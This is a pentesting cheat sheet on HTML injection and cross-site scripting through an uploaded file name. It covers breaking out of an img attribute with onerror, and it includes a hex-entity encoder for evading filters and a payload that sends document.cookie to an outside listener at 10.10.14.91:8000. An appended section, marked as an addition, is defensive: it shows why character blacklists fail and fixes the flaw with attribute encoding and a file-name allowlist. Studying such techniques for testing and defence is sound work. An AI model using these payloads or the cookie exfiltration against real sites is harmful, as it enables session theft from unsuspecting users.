HTML Injection
The OnError Bypass Method
The onerror event handler is one of the most reliable HTML injection techniques because it triggers automatically when an HTML element fails to load a resource.
This makes it well suited to bypassing input filters that do not sanitize double quotes.
x" onerror="PAYLOAD" x="

Breakdown
x" - Closes the current HTML attribute value
onerror="" - Injects the JavaScript event handler
x=" - Opens a new attribute to maintain valid HTML syntax
File Upload Context
<img src="<?php echo $cat['photo_path']; ?>" alt="x" onerror="" x="" class="cat-photo">

Trigger the Error
Content-Disposition: form-data; name="cat_photo"; filename="x\"onerror=\"[encoded_payload]\" x=\".png"
Content-Type: image/png
GIF89a;
test

Context-Aware Payload Construction
filename" onerror="alert(document.domain)" x="
<img src=x onerror="alert(1)">
malicious" onerror="payload" x=".txt
test" onmouseover="alert(document.cookie)" x="

Common characters that may be filtered
Parentheses () - Required for JavaScript function calls
Semicolons ; - Used to terminate JavaScript statements
Quotes ' - May be filtered while " is not
Angle brackets <> - HTML tag delimiters
Bypass Using HTML Hex Encoding
Python encoding script
#!/usr/bin/python3
import sys

if len(sys.argv) != 2:
    print(f'[!] Usage: {sys.argv[0]} <payload>')
    sys.exit(1)

string = sys.argv[1]

def Encoding(string):
    # Emit every character as an HTML hex character reference (&#xNN).
    # The trailing ';' is left out on purpose: it is one of the commonly
    # filtered characters listed above, and browsers decode the reference anyway.
    output = ''
    for character in string:
        output += '&#x' + hex(ord(character))[2:]
    return output

if __name__ == '__main__':
    hexHtmlEncoding = Encoding(string)
    print(hexHtmlEncoding)

python3 encode.py "fetch('http://10.10.14.91:8000/?cookie=' + document.cookie);"

Cyber-Chef Recipe example
https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity(true,'Hex%20entities')Find_/_Replace(%7B'option':'Regex','string':';'%7D,'',true,false,true,false)&input=ZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC45MTo4MDAwLz9jb29raWU9JyArIGRvY3VtZW50LmNvb2tpZSk7&ieol=CRLF&oeol=FF
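As an added example (not part of the original page), the following Python shows why a character blacklist does not stop the hex-encoded handler body and what the fix looks like: the injected upload name is parsed the way a browser tokenizer would see it, the src attribute is rendered both without and with attribute-context encoding, and an allowlist on the name's shape stands in for the upload policy. The hex_entity_encode function repeats the page's encoding; the /uploads/ path, the cat-photo class and the allowlist pattern are assumptions for illustration.

```python
import html
import re
from html.parser import HTMLParser

# Characters the page lists as commonly blacklisted; note the double quote is not among them.
BLACKLIST = set("();'<>")
# Assumed upload-name policy for this example: letters, digits, _ or -, plus an image extension.
SAFE_NAME = re.compile(r'[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif)', re.IGNORECASE)

def hex_entity_encode(s: str) -> str:
    """Same transform as the page's script: hex character references with no ';' terminator."""
    return ''.join(f'&#x{ord(c):x}' for c in s)

def blacklist_passes(value: str) -> bool:
    """Naive filter: accepts the value if no blacklisted character appears literally."""
    return not (set(value) & BLACKLIST)

class _AttrCollector(HTMLParser):
    """Records start-tag attributes as a browser's tokenizer would deliver them."""
    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)

def parsed_attrs(rendered_html: str) -> dict:
    """Parse rendered markup; attribute values come back with character references decoded."""
    p = _AttrCollector()
    p.feed(rendered_html)
    return dict(p.attrs)

def render_unsafe(filename: str) -> str:
    """Vulnerable pattern: the upload name lands in src without attribute encoding."""
    return f'<img src="/uploads/{filename}" class="cat-photo">'

def render_safe(filename: str) -> str:
    """Fix: attribute-context encoding, so a quote in the name can never close the value."""
    return f'<img src="/uploads/{html.escape(filename, quote=True)}" class="cat-photo">'

def filename_allowed(filename: str) -> bool:
    """Defence in depth: validate the name's shape instead of blacklisting characters."""
    return SAFE_NAME.fullmatch(filename) is not None

if __name__ == '__main__':
    # Constructed sample: the page's injected upload name with an entity-encoded handler body.
    name = 'x" onerror="' + hex_entity_encode('alert(document.domain)') + '" x=".png'
    print(blacklist_passes(name), parsed_attrs(render_unsafe(name)))
    print(parsed_attrs(render_safe(name)), filename_allowed(name))
```

With the unencoded template the parser reports an onerror attribute whose value has already decoded back to alert(document.domain); with html.escape applied only src and class survive, and the allowlist rejects the name outright.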